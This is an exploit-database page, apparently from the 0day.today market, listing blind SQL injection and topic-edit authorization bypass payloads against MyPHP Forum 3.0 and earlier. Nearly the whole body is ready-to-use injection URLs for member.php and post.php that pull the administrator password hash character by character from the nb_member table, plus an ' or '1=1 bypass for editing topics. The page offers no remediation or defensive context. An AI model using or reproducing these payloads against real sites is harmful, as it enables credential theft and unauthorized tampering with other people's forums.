[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyPHP Forum <= 3.0 Edit Topics/Blind SQL Injection Vulnerabilities

Author
StAkeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3964
Category
web applications
Date add
30-10-2008
Platform
unsorted
==================================================================
MyPHP Forum <= 3.0 Edit Topics/Blind SQL Injection Vulnerabilities
==================================================================


/*
    -----------------------------------------------------------------------------------
    MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
    -----------------------------------------------------------------------------------
    Discovered By StAkeR
    Download On http://www.myphp.ws/
    

   - member.php (confirm - Blind SQL Injection)
   - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* 
 
   - member.php (newconfirm - Blind SQL Injection)
   - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--
    
   - member.php?action=reqpwd  (reqpwd - Blind SQL Injection)
   - insert  ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#
    
   - post.php (post Blind SQL Injection)
   - post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23
    
   - post.php (edit - Edit Topics)
   - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1
        
    
    
    
/*    




#  0day.today [2024-12-25]  #